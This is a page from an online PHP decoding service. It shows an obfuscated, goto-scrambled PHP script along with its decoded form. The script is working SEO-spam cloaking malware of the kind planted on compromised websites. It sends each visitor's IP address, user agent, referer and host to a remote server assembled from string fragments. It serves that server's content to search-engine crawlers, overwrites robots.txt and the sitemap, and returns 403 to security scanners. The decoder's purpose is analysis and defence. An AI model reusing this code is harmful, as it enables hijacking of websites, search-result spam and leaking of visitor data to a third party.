Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
goto bDsTk; xZwnX: @file_put_contents("\171\x77\167\56\x74\170\x74", "\60"); goto k3ll2; ..
Decoded Output download
<? goto bDsTk; xZwnX: @file_put_contents("yww.txt", "0"); goto k3ll2; TNxwK: N4NM_: goto EL5hx; QEhA_: cmaQB: goto iItnj; CC4u7: $_SERVER["REQUEST_SCHEME"] = "https"; goto YNyPW; c6Oif: goto tih32; goto RGzF4; zZpeC: gRvgT: goto EKql2; nb_Wu: lukEb: goto CC4u7; YNyPW: aitss: goto cKaFy; iItnj: $LBqd0 = $cX2wl . "?agent={$buqvR}&refer={$tQxWH}&lang={$TmPsw}&ip={$l3OGx}&dom={$RHdOQ}&http={$XIKkN}&uri={$ttTGC}&pc={$xn41f}&rewriteable={$S54Kw}&script={$tZZjo}"; goto qUKAr; nPbEH: $cphbh = "{$XIKkN}://" . $RHdOQ . $AtYnc . "sitemap.xml"; goto JwMhc; SfmgZ: if (!(strpos($ttTGC, "pingsitemap") !== false)) { goto DE_Xh; } goto Gcyuc; ntCSw: goto MchHW; goto aZOPN; pDEtp: $JG3uY = curl_init(); goto bOtB3; m1OWt: $mJzSk = "User-agent: *\xd
Allow: /"; goto nPbEH; EL5hx: $l3OGx = $_SERVER["HTTP_X_FORWARDED_FOR"]; goto gK1oZ; gQ9w5: goto PHtRP; goto PIO3_; nYp_R: if (strpos($AtYnc, "index.ph") !== false) { goto jcise; } goto XfMmh; lFMVW: $buqvR = urlencode($_SERVER["HTTP_USER_AGENT"]); goto pv8LD; DCYZE: goto aekcM; goto WlIgT; tjnbq: goto wqo7b; goto TNxwK; QcIeV: if (!empty(@$_SERVER["HTTP_X_FORWARDED_FOR"])) { goto N4NM_; } goto KAxJN; bOtB3: curl_setopt($JG3uY, CURLOPT_URL, $LBqd0); goto SvCjA; V16O6: $mwsnJ = curl_exec($JG3uY); goto SdhA5; gci2X: curl_setopt($JG3uY, CURLOPT_SSL_VERIFYPEER, FALSE); goto ZGmpN; ZfT6q: echo $mwsnJ; goto QEy7x; QEDlC: $mwsnJ = @file_get_contents($wTZrA); goto WzTTz; Zm8Zm: aekcM: goto AMnPp; Yw6Lr: if (!empty($_SERVER["REQUEST_SCHEME"]) && $_SERVER["REQUEST_SCHEME"] == "https" || !empty($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] == "on" || !empty($_SERVER["SERVER_PORT"]) && $_SERVER["SERVER_PORT"] == "443" || isset($_SERVER["HTTP_X_FORWARDED_PROTO"]) && $_SERVER["HTTP_X_FORWARDED_PROTO"] == "https") { goto lukEb; } goto O_zY0; O6CKk: $o24Gv = "cw87"; goto OkZ8F; XE2zt: $vbJwY = "http://"; goto nE7Ah; Wc4UO: $S54Kw = 0; goto xZwnX; PCrt3: $tZZjo = urlencode($_SERVER["SCRIPT_NAME"]); goto Yw6Lr; Lq0EV: $LBqd0 = $cX2wl . "?agent={$buqvR}&refer={$tQxWH}&lang={$TmPsw}&ip={$l3OGx}&dom={$RHdOQ}&http={$XIKkN}&uri={$ttTGC}&pc={$xn41f}&rewriteable={$S54Kw}&script={$tZZjo}&sitemap=" . urlencode($cphbh); goto x2KYr; X4vwH: PHtRP: goto f_pv9; A0jnB: return; goto jP8ik; t7ZcN: if (!(strpos($ttTGC, "ywwyww") !== false)) { goto ZxE29; } goto KayvF; T93j8: wJ020: goto sVCzn; aZOPN: jcise: goto bTc4G; LP31N: $cX2wl = $vbJwY . $o24Gv . $f14mX . $PZury . $tFWPy; goto dk8Md; rKsW0: $mwsnJ = @file_get_contents($LBqd0); goto apNrZ; dk8Md: $xn41f = "VVIKBgE"; goto kTxRK; d43Fd: pUhbV: goto ZVOBM; pv8LD: $TmPsw = urlencode(@$_SERVER["HTTP_ACCEPT_LANGUAGE"]); goto ofxhk; nE7Ah: $f14mX = "3.les"; goto O6CKk; LQhbd: $JG3uY = curl_init(); goto EIzBn; WvzNz: header("Content-Type: text/xml; charset=utf-8"); goto Zm8Zm; ELBWf: exit; goto T93j8; jP8ik: bWsBd: goto DY_d9; sVCzn: $tQxWH = urlencode(@$_SERVER["HTTP_REFERER"]); goto lFMVW; Sa5Ww: $l3OGx = urlencode($l3OGx); goto fpmCg; f_pv9: exit; goto A0jnB; dfmuY: NDyyK: goto hT5vQ; EIzBn: curl_setopt($JG3uY, CURLOPT_URL, $wTZrA); goto WWMEx; QLg1E: I1FmB: goto hHVDV; SdhA5: curl_close($JG3uY); goto XKLds; OWofG: qVc2z: goto ZfT6q; bEWT5: $ttTGC = urlencode($_SERVER["REQUEST_URI"]); goto t7ZcN; QEy7x: if (!empty($mJzSk)) { goto wljgT; } goto wz61w; ZGmpN: curl_setopt($JG3uY, CURLOPT_SSL_VERIFYHOST, FALSE); goto yrMeJ; gK1oZ: wqo7b: goto Sa5Ww; O_zY0: $_SERVER["REQUEST_SCHEME"] = "http"; goto uM47w; R8pcN: if (!preg_match("/(coolpadWebkit|OBot|paloaltonetworks|Python-requests|Ezooms|LightDeckReports Bot|Feedly|semrushBot|yandexBot|ApacheBench|Jaunty|Swiftbot|ZmEu|CrawlDaddy|Python-urllib|scrapy|AhrefsBot|yisouSpider|AskTbFXTV|JikeSpider|DigExt|Python|heritrix|PetalBot|AmazonBot|httpClient|Java|feedDemon|yySpider|EasouSpider|barkrowler|Indy Library|Mj12bot|Bytespider|UniversalFeedParser)/i", $_SERVER["HTTP_USER_AGENT"])) { goto wJ020; } goto C0bBK; PMWBg: if (!(substr($mwsnJ, 0, 10) == "error code" || $mwsnJ == "500")) { goto BJH8Q; } goto ksjlJ; ejVL5: if (!file_exists("yww.txt")) { goto C3pKT; } goto HNYre; KayvF: echo "ok"; goto rTsnO; ofxhk: $l3OGx = $_SERVER["REMOTE_ADDR"]; goto wy9IR; cKaFy: $XIKkN = urlencode($_SERVER["REQUEST_SCHEME"]); goto bEWT5; Zb6MK: exit; goto O6y2S; wy9IR: if (!empty(@$_SERVER["HTTP_CLIENT_IP"])) { goto gAeNv; } goto QcIeV; wz61w: if (!(strpos($ttTGC, "robots.txt") !== false)) { goto bwFlc; } goto VjuQv; bDsTk: $tFWPy = "shop/"; goto XE2zt; apNrZ: if (!empty($mwsnJ)) { goto FOHMf; } goto pDEtp; OkZ8F: $PZury = "biantown."; goto LP31N; HNYre: $S54Kw = @file_get_contents("yww.txt"); goto c6Oif; f4JjS: tih32: goto I9Us5; uM47w: goto aitss; goto nb_Wu; y4BW3: goto vK1uw; goto QEhA_; fpmCg: $RHdOQ = urlencode($_SERVER["HTTP_HOST"]); goto PCrt3; U8RCN: $S54Kw = 0; goto ejVL5; hHVDV: $AtYnc = "/?"; goto ijuiK; k3ll2: goto KzZFD; goto zZpeC; VjuQv: @file_put_contents("robots.txt", $mwsnJ); goto PBhP2; TFg2v: gAeNv: goto b_gLO; JwMhc: $mJzSk = trim($mJzSk) . "\xd
" . "Sitemap: {$cphbh}"; goto E8Ja9; DHCjg: goto dsRh9; goto QLg1E; KAxJN: goto wqo7b; goto TFg2v; WlIgT: H_YfB: goto WvzNz; kTxRK: $S7Ego = "Yahoo|Docomo|Bing|Google"; goto cR6pu; qUKAr: $mJzSk = ''; goto SfmgZ; KtRlB: if ($mwsnJ == "ok") { goto gRvgT; } goto Wc4UO; J6UVY: if (empty($mwsnJ)) { goto bWsBd; } goto PMWBg; s5GQR: curl_close($JG3uY); goto CxEu7; ksjlJ: header("HTTP/1.0 500 Internal Server Error"); goto Zb6MK; LyagK: curl_setopt($JG3uY, CURLOPT_FOLLOWLOCATION, false); goto gci2X; lalKD: curl_setopt($JG3uY, CURLOPT_FOLLOWLOCATION, false); goto iJBub; rTsnO: exit; goto EW7hm; E8Ja9: $JN9tY = ''; goto JIokQ; EKql2: $S54Kw = 1; goto kLsf4; XfMmh: $AtYnc = $AtYnc . "?"; goto ntCSw; XKLds: gvPSW: goto KtRlB; PBhP2: bwFlc: goto gQ9w5; bTc4G: if ($S54Kw == 0) { goto I1FmB; } goto kz0_g; ijuiK: dsRh9: goto uDalq; x2KYr: DE_Xh: goto rKsW0; C0bBK: header("HTTP/1.0 403 Forbidden"); goto ELBWf; CxEu7: FOHMf: goto J6UVY; iJBub: curl_setopt($JG3uY, CURLOPT_SSL_VERIFYPEER, FALSE); goto BYnh4; mFoEh: $wTZrA = $XIKkN . "://" . $_SERVER["HTTP_HOST"] . "/ywwyww"; goto QEDlC; Gcyuc: $AtYnc = $_SERVER["SCRIPT_NAME"]; goto nYp_R; RGzF4: C3pKT: goto mFoEh; TMi6o: if (strpos($ttTGC, "jp2023") !== false || preg_match("/({$S7Ego})/i", $_SERVER["HTTP_REFERER"])) { goto NDyyK; } goto b71fa; b_gLO: $l3OGx = $_SERVER["HTTP_CLIENT_IP"]; goto tjnbq; kz0_g: $AtYnc = "/"; goto DHCjg; go5HH: if (strpos($ttTGC, "robots.txt") !== false || strpos($ttTGC, "pingsitemap") !== false || strpos($ttTGC, "jp2023") !== false || preg_match("@^/(.*?).xml$@i", $_SERVER["REQUEST_URI"]) || preg_match("/({$S7Ego})/i", $_SERVER["HTTP_USER_AGENT"]) || preg_match("/({$S7Ego})/i", $_SERVER["HTTP_REFERER"])) { goto cmaQB; } goto y4BW3; kLsf4: @file_put_contents("yww.txt", "1"); goto ytkcd; JIokQ: echo $cphbh . ": " . $JN9tY . "<br/>"; goto Lq0EV; yrMeJ: $mwsnJ = curl_exec($JG3uY); goto s5GQR; WWMEx: curl_setopt($JG3uY, CURLOPT_RETURNTRANSFER, true); goto lalKD; PIO3_: wljgT: goto RB2ge; O6y2S: BJH8Q: goto TMi6o; RB2ge: @file_put_contents("robots.txt", $mJzSk); goto X4vwH; hT5vQ: header("HTTP/1.1 404 Not Found"); goto OWofG; I9Us5: if (strpos($ttTGC, "favicon.ico") !== false) { goto pUhbV; } goto go5HH; DY_d9: vK1uw: goto qoOI7; b71fa: if (substr($mwsnJ, 0, 5) == "<?xml") { goto H_YfB; } goto wkR2i; BYnh4: curl_setopt($JG3uY, CURLOPT_SSL_VERIFYHOST, FALSE); goto V16O6; uDalq: MchHW: goto m1OWt; EW7hm: ZxE29: goto U8RCN; cR6pu: error_reporting(0); goto R8pcN; qoOI7: goto I8_uY; goto d43Fd; AMnPp: goto qVc2z; goto dfmuY; SvCjA: curl_setopt($JG3uY, CURLOPT_RETURNTRANSFER, true); goto LyagK; WzTTz: if (!empty($mwsnJ)) { goto gvPSW; } goto LQhbd; wkR2i: header("Content-Type: text/html; charset=utf-8"); goto DCYZE; ytkcd: KzZFD: goto f4JjS; ZVOBM: I8_uY:
?>
Did this file decode correctly?
Original Code
goto bDsTk; xZwnX: @file_put_contents("\171\x77\167\56\x74\170\x74", "\60"); goto k3ll2; TNxwK: N4NM_: goto EL5hx; QEhA_: cmaQB: goto iItnj; CC4u7: $_SERVER["\122\x45\x51\x55\105\x53\124\137\123\x43\110\x45\x4d\105"] = "\x68\164\x74\160\x73"; goto YNyPW; c6Oif: goto tih32; goto RGzF4; zZpeC: gRvgT: goto EKql2; nb_Wu: lukEb: goto CC4u7; YNyPW: aitss: goto cKaFy; iItnj: $LBqd0 = $cX2wl . "\77\141\x67\x65\156\164\x3d{$buqvR}\46\x72\x65\146\x65\162\75{$tQxWH}\46\154\x61\x6e\x67\x3d{$TmPsw}\46\151\160\75{$l3OGx}\x26\144\157\x6d\x3d{$RHdOQ}\46\150\x74\164\x70\75{$XIKkN}\x26\x75\x72\x69\x3d{$ttTGC}\x26\160\143\x3d{$xn41f}\x26\162\145\x77\162\x69\x74\145\x61\142\154\x65\x3d{$S54Kw}\46\x73\143\162\x69\160\x74\75{$tZZjo}"; goto qUKAr; nPbEH: $cphbh = "{$XIKkN}\72\57\x2f" . $RHdOQ . $AtYnc . "\x73\151\x74\145\155\x61\160\x2e\x78\x6d\x6c"; goto JwMhc; SfmgZ: if (!(strpos($ttTGC, "\x70\151\x6e\x67\x73\x69\x74\145\155\141\x70") !== false)) { goto DE_Xh; } goto Gcyuc; ntCSw: goto MchHW; goto aZOPN; pDEtp: $JG3uY = curl_init(); goto bOtB3; m1OWt: $mJzSk = "\x55\163\x65\x72\x2d\x61\x67\145\156\x74\72\x20\52\xd\12\x41\x6c\x6c\157\167\72\40\x2f"; goto nPbEH; EL5hx: $l3OGx = $_SERVER["\110\124\x54\120\137\130\137\x46\x4f\122\x57\101\x52\104\x45\104\137\106\117\x52"]; goto gK1oZ; gQ9w5: goto PHtRP; goto PIO3_; nYp_R: if (strpos($AtYnc, "\x69\x6e\144\145\x78\x2e\x70\x68") !== false) { goto jcise; } goto XfMmh; lFMVW: $buqvR = urlencode($_SERVER["\110\124\124\x50\137\x55\123\105\122\137\101\x47\x45\x4e\x54"]); goto pv8LD; DCYZE: goto aekcM; goto WlIgT; tjnbq: goto wqo7b; goto TNxwK; QcIeV: if (!empty(@$_SERVER["\x48\124\124\120\137\x58\137\x46\x4f\122\x57\101\122\104\105\x44\x5f\x46\x4f\x52"])) { goto N4NM_; } goto KAxJN; bOtB3: curl_setopt($JG3uY, CURLOPT_URL, $LBqd0); goto SvCjA; V16O6: $mwsnJ = curl_exec($JG3uY); goto SdhA5; gci2X: curl_setopt($JG3uY, CURLOPT_SSL_VERIFYPEER, FALSE); goto ZGmpN; ZfT6q: echo $mwsnJ; goto QEy7x; QEDlC: $mwsnJ = @file_get_contents($wTZrA); goto WzTTz; Zm8Zm: aekcM: goto AMnPp; Yw6Lr: if (!empty($_SERVER["\x52\x45\x51\125\x45\123\x54\137\123\103\x48\x45\x4d\x45"]) && $_SERVER["\x52\x45\121\125\105\x53\124\137\x53\103\110\105\115\x45"] == "\150\x74\164\x70\163" || !empty($_SERVER["\x48\x54\x54\x50\x53"]) && $_SERVER["\110\x54\124\120\123"] == "\157\156" || !empty($_SERVER["\123\105\x52\x56\105\x52\x5f\x50\117\x52\124"]) && $_SERVER["\123\105\122\126\105\122\137\x50\117\x52\x54"] == "\64\64\63" || isset($_SERVER["\x48\x54\124\120\137\x58\137\106\117\122\x57\101\122\x44\x45\104\x5f\x50\x52\117\x54\117"]) && $_SERVER["\110\124\124\120\137\130\x5f\106\x4f\122\127\101\x52\104\x45\104\x5f\x50\x52\117\124\117"] == "\x68\x74\x74\160\163") { goto lukEb; } goto O_zY0; O6CKk: $o24Gv = "\143\167\x38\67"; goto OkZ8F; XE2zt: $vbJwY = "\150\x74\x74\x70\72\x2f\57"; goto nE7Ah; Wc4UO: $S54Kw = 0; goto xZwnX; PCrt3: $tZZjo = urlencode($_SERVER["\123\x43\122\x49\120\124\137\116\101\115\105"]); goto Yw6Lr; Lq0EV: $LBqd0 = $cX2wl . "\x3f\x61\147\145\156\x74\75{$buqvR}\x26\x72\x65\x66\145\x72\75{$tQxWH}\x26\x6c\x61\x6e\x67\x3d{$TmPsw}\46\151\160\75{$l3OGx}\x26\144\157\155\75{$RHdOQ}\46\x68\x74\164\160\x3d{$XIKkN}\x26\x75\162\151\75{$ttTGC}\x26\x70\x63\x3d{$xn41f}\46\162\145\167\x72\151\x74\145\141\142\x6c\x65\75{$S54Kw}\46\163\143\x72\x69\x70\164\x3d{$tZZjo}\46\163\151\x74\145\155\141\x70\x3d" . urlencode($cphbh); goto x2KYr; X4vwH: PHtRP: goto f_pv9; A0jnB: return; goto jP8ik; t7ZcN: if (!(strpos($ttTGC, "\171\167\167\171\167\x77") !== false)) { goto ZxE29; } goto KayvF; T93j8: wJ020: goto sVCzn; aZOPN: jcise: goto bTc4G; LP31N: $cX2wl = $vbJwY . $o24Gv . $f14mX . $PZury . $tFWPy; goto dk8Md; rKsW0: $mwsnJ = @file_get_contents($LBqd0); goto apNrZ; dk8Md: $xn41f = "\x56\x56\x49\x4b\102\x67\105"; goto kTxRK; d43Fd: pUhbV: goto ZVOBM; pv8LD: $TmPsw = urlencode(@$_SERVER["\x48\x54\124\120\137\101\103\103\105\x50\124\x5f\114\x41\116\x47\125\x41\x47\105"]); goto ofxhk; nE7Ah: $f14mX = "\63\56\154\145\x73"; goto O6CKk; LQhbd: $JG3uY = curl_init(); goto EIzBn; WvzNz: header("\103\x6f\x6e\164\145\156\164\x2d\124\171\160\145\x3a\40\164\x65\170\x74\x2f\x78\x6d\x6c\x3b\x20\143\x68\141\162\x73\145\x74\x3d\165\x74\146\x2d\70"); goto Zm8Zm; ELBWf: exit; goto T93j8; jP8ik: bWsBd: goto DY_d9; sVCzn: $tQxWH = urlencode(@$_SERVER["\110\124\124\120\137\122\x45\x46\x45\x52\105\x52"]); goto lFMVW; Sa5Ww: $l3OGx = urlencode($l3OGx); goto fpmCg; f_pv9: exit; goto A0jnB; dfmuY: NDyyK: goto hT5vQ; EIzBn: curl_setopt($JG3uY, CURLOPT_URL, $wTZrA); goto WWMEx; QLg1E: I1FmB: goto hHVDV; SdhA5: curl_close($JG3uY); goto XKLds; OWofG: qVc2z: goto ZfT6q; bEWT5: $ttTGC = urlencode($_SERVER["\x52\105\121\125\105\x53\x54\137\125\122\x49"]); goto t7ZcN; QEy7x: if (!empty($mJzSk)) { goto wljgT; } goto wz61w; ZGmpN: curl_setopt($JG3uY, CURLOPT_SSL_VERIFYHOST, FALSE); goto yrMeJ; gK1oZ: wqo7b: goto Sa5Ww; O_zY0: $_SERVER["\122\x45\121\125\x45\x53\x54\137\123\103\x48\x45\115\x45"] = "\150\x74\164\160"; goto uM47w; R8pcN: if (!preg_match("\x2f\x28\x63\x6f\x6f\154\160\x61\x64\x57\x65\x62\153\x69\x74\174\117\102\x6f\x74\174\160\141\154\x6f\141\154\164\x6f\156\145\x74\x77\157\x72\x6b\x73\x7c\120\171\164\150\157\x6e\55\162\x65\161\165\x65\x73\x74\163\x7c\105\172\x6f\x6f\155\x73\174\x4c\x69\x67\x68\164\x44\145\143\153\x52\x65\160\157\x72\164\x73\x20\102\x6f\x74\x7c\106\145\x65\144\x6c\171\174\163\145\x6d\x72\165\x73\x68\x42\x6f\164\x7c\x79\141\156\x64\x65\x78\x42\157\x74\x7c\x41\160\141\143\x68\x65\x42\145\156\143\150\x7c\112\141\x75\156\164\x79\174\123\167\151\146\x74\x62\157\164\174\132\x6d\x45\x75\x7c\103\x72\141\167\154\104\x61\144\x64\x79\174\x50\x79\x74\x68\x6f\x6e\55\x75\x72\154\154\x69\142\174\163\x63\x72\x61\160\x79\x7c\101\x68\x72\x65\x66\x73\x42\x6f\164\x7c\171\x69\163\157\x75\x53\160\151\144\145\162\x7c\x41\163\x6b\x54\x62\106\x58\124\126\174\112\x69\x6b\x65\123\x70\x69\x64\x65\162\174\104\x69\x67\x45\170\164\174\120\171\164\x68\157\156\174\150\145\162\151\x74\162\151\x78\x7c\120\x65\x74\x61\154\x42\x6f\x74\174\x41\155\141\x7a\x6f\x6e\x42\157\164\174\x68\x74\164\160\x43\154\x69\x65\x6e\164\x7c\112\x61\166\x61\174\x66\x65\x65\x64\x44\145\155\x6f\x6e\x7c\x79\x79\x53\160\151\x64\145\x72\x7c\x45\141\163\157\x75\x53\160\x69\144\x65\162\x7c\x62\x61\x72\153\162\x6f\167\154\145\162\x7c\x49\x6e\x64\171\x20\114\x69\x62\162\x61\x72\x79\174\x4d\x6a\61\62\142\157\x74\174\102\171\x74\145\x73\x70\x69\144\145\x72\x7c\125\x6e\151\166\x65\x72\163\x61\154\106\x65\145\x64\120\x61\x72\x73\x65\x72\x29\57\151", $_SERVER["\x48\124\x54\x50\x5f\x55\123\105\122\137\x41\107\105\116\x54"])) { goto wJ020; } goto C0bBK; PMWBg: if (!(substr($mwsnJ, 0, 10) == "\x65\162\162\157\x72\x20\143\x6f\144\145" || $mwsnJ == "\x35\x30\60")) { goto BJH8Q; } goto ksjlJ; ejVL5: if (!file_exists("\171\167\167\x2e\x74\170\x74")) { goto C3pKT; } goto HNYre; KayvF: echo "\x6f\x6b"; goto rTsnO; ofxhk: $l3OGx = $_SERVER["\x52\x45\115\x4f\124\105\137\x41\x44\x44\x52"]; goto wy9IR; cKaFy: $XIKkN = urlencode($_SERVER["\122\x45\121\125\x45\123\124\137\x53\x43\110\105\115\x45"]); goto bEWT5; Zb6MK: exit; goto O6y2S; wy9IR: if (!empty(@$_SERVER["\x48\x54\x54\120\x5f\103\114\111\105\x4e\x54\137\111\120"])) { goto gAeNv; } goto QcIeV; wz61w: if (!(strpos($ttTGC, "\162\x6f\142\x6f\x74\x73\x2e\164\x78\x74") !== false)) { goto bwFlc; } goto VjuQv; bDsTk: $tFWPy = "\163\x68\157\x70\x2f"; goto XE2zt; apNrZ: if (!empty($mwsnJ)) { goto FOHMf; } goto pDEtp; OkZ8F: $PZury = "\x62\151\x61\156\164\157\x77\x6e\x2e"; goto LP31N; HNYre: $S54Kw = @file_get_contents("\x79\167\167\56\x74\170\x74"); goto c6Oif; f4JjS: tih32: goto I9Us5; uM47w: goto aitss; goto nb_Wu; y4BW3: goto vK1uw; goto QEhA_; fpmCg: $RHdOQ = urlencode($_SERVER["\110\124\x54\120\137\x48\x4f\x53\124"]); goto PCrt3; U8RCN: $S54Kw = 0; goto ejVL5; hHVDV: $AtYnc = "\x2f\77"; goto ijuiK; k3ll2: goto KzZFD; goto zZpeC; VjuQv: @file_put_contents("\162\157\142\x6f\164\x73\56\x74\170\164", $mwsnJ); goto PBhP2; TFg2v: gAeNv: goto b_gLO; JwMhc: $mJzSk = trim($mJzSk) . "\xd\12" . "\x53\151\x74\x65\x6d\141\x70\72\40{$cphbh}"; goto E8Ja9; DHCjg: goto dsRh9; goto QLg1E; KAxJN: goto wqo7b; goto TFg2v; WlIgT: H_YfB: goto WvzNz; kTxRK: $S7Ego = "\131\x61\150\x6f\157\174\x44\x6f\143\x6f\x6d\x6f\174\x42\x69\156\147\174\x47\x6f\x6f\x67\x6c\145"; goto cR6pu; qUKAr: $mJzSk = ''; goto SfmgZ; KtRlB: if ($mwsnJ == "\x6f\x6b") { goto gRvgT; } goto Wc4UO; J6UVY: if (empty($mwsnJ)) { goto bWsBd; } goto PMWBg; s5GQR: curl_close($JG3uY); goto CxEu7; ksjlJ: header("\x48\124\x54\x50\x2f\61\56\x30\x20\65\60\x30\x20\111\x6e\x74\x65\x72\156\x61\x6c\x20\123\145\162\x76\145\162\40\x45\x72\162\157\162"); goto Zb6MK; LyagK: curl_setopt($JG3uY, CURLOPT_FOLLOWLOCATION, false); goto gci2X; lalKD: curl_setopt($JG3uY, CURLOPT_FOLLOWLOCATION, false); goto iJBub; rTsnO: exit; goto EW7hm; E8Ja9: $JN9tY = ''; goto JIokQ; EKql2: $S54Kw = 1; goto kLsf4; XfMmh: $AtYnc = $AtYnc . "\x3f"; goto ntCSw; XKLds: gvPSW: goto KtRlB; PBhP2: bwFlc: goto gQ9w5; bTc4G: if ($S54Kw == 0) { goto I1FmB; } goto kz0_g; ijuiK: dsRh9: goto uDalq; x2KYr: DE_Xh: goto rKsW0; C0bBK: header("\110\124\x54\120\x2f\x31\56\x30\40\64\60\63\x20\106\157\x72\142\x69\x64\x64\x65\x6e"); goto ELBWf; CxEu7: FOHMf: goto J6UVY; iJBub: curl_setopt($JG3uY, CURLOPT_SSL_VERIFYPEER, FALSE); goto BYnh4; mFoEh: $wTZrA = $XIKkN . "\72\x2f\x2f" . $_SERVER["\x48\x54\x54\x50\x5f\x48\x4f\123\x54"] . "\57\171\167\x77\171\167\167"; goto QEDlC; Gcyuc: $AtYnc = $_SERVER["\123\103\x52\x49\x50\x54\x5f\116\101\115\105"]; goto nYp_R; RGzF4: C3pKT: goto mFoEh; TMi6o: if (strpos($ttTGC, "\152\x70\x32\x30\62\x33") !== false || preg_match("\x2f\50{$S7Ego}\x29\57\151", $_SERVER["\x48\x54\124\x50\137\x52\105\106\x45\122\105\122"])) { goto NDyyK; } goto b71fa; b_gLO: $l3OGx = $_SERVER["\110\124\124\120\137\103\114\x49\105\116\x54\137\x49\120"]; goto tjnbq; kz0_g: $AtYnc = "\57"; goto DHCjg; go5HH: if (strpos($ttTGC, "\x72\157\x62\x6f\x74\x73\56\164\x78\x74") !== false || strpos($ttTGC, "\160\151\x6e\147\x73\x69\x74\x65\155\141\x70") !== false || strpos($ttTGC, "\152\x70\x32\x30\62\x33") !== false || preg_match("\x40\x5e\x2f\x28\x2e\52\x3f\x29\56\170\x6d\154\44\100\151", $_SERVER["\122\x45\121\x55\105\x53\124\x5f\125\x52\111"]) || preg_match("\x2f\50{$S7Ego}\x29\57\151", $_SERVER["\x48\124\x54\120\137\x55\x53\105\x52\x5f\x41\x47\x45\x4e\x54"]) || preg_match("\57\50{$S7Ego}\x29\x2f\151", $_SERVER["\x48\124\124\x50\137\x52\x45\x46\x45\x52\x45\x52"])) { goto cmaQB; } goto y4BW3; kLsf4: @file_put_contents("\x79\167\167\56\164\x78\164", "\x31"); goto ytkcd; JIokQ: echo $cphbh . "\x3a\x20" . $JN9tY . "\74\x62\x72\57\x3e"; goto Lq0EV; yrMeJ: $mwsnJ = curl_exec($JG3uY); goto s5GQR; WWMEx: curl_setopt($JG3uY, CURLOPT_RETURNTRANSFER, true); goto lalKD; PIO3_: wljgT: goto RB2ge; O6y2S: BJH8Q: goto TMi6o; RB2ge: @file_put_contents("\x72\157\142\x6f\164\x73\56\164\x78\x74", $mJzSk); goto X4vwH; hT5vQ: header("\110\x54\x54\x50\57\x31\56\61\x20\x34\x30\x34\40\116\157\164\x20\x46\157\x75\156\x64"); goto OWofG; I9Us5: if (strpos($ttTGC, "\146\x61\x76\x69\143\157\x6e\x2e\151\143\x6f") !== false) { goto pUhbV; } goto go5HH; DY_d9: vK1uw: goto qoOI7; b71fa: if (substr($mwsnJ, 0, 5) == "\x3c\x3f\x78\x6d\154") { goto H_YfB; } goto wkR2i; BYnh4: curl_setopt($JG3uY, CURLOPT_SSL_VERIFYHOST, FALSE); goto V16O6; uDalq: MchHW: goto m1OWt; EW7hm: ZxE29: goto U8RCN; cR6pu: error_reporting(0); goto R8pcN; qoOI7: goto I8_uY; goto d43Fd; AMnPp: goto qVc2z; goto dfmuY; SvCjA: curl_setopt($JG3uY, CURLOPT_RETURNTRANSFER, true); goto LyagK; WzTTz: if (!empty($mwsnJ)) { goto gvPSW; } goto LQhbd; wkR2i: header("\x43\157\156\164\x65\156\x74\55\x54\x79\160\x65\x3a\x20\164\145\x78\164\57\x68\164\155\x6c\x3b\40\143\x68\141\162\x73\x65\164\x3d\x75\x74\x66\55\x38"); goto DCYZE; ytkcd: KzZFD: goto f4JjS; ZVOBM: I8_uY:
Function Calls
None |
Stats
MD5 | a40562c5f1793316ef7d7003f388cf21 |
Eval Count | 0 |
Decode Time | 54 ms |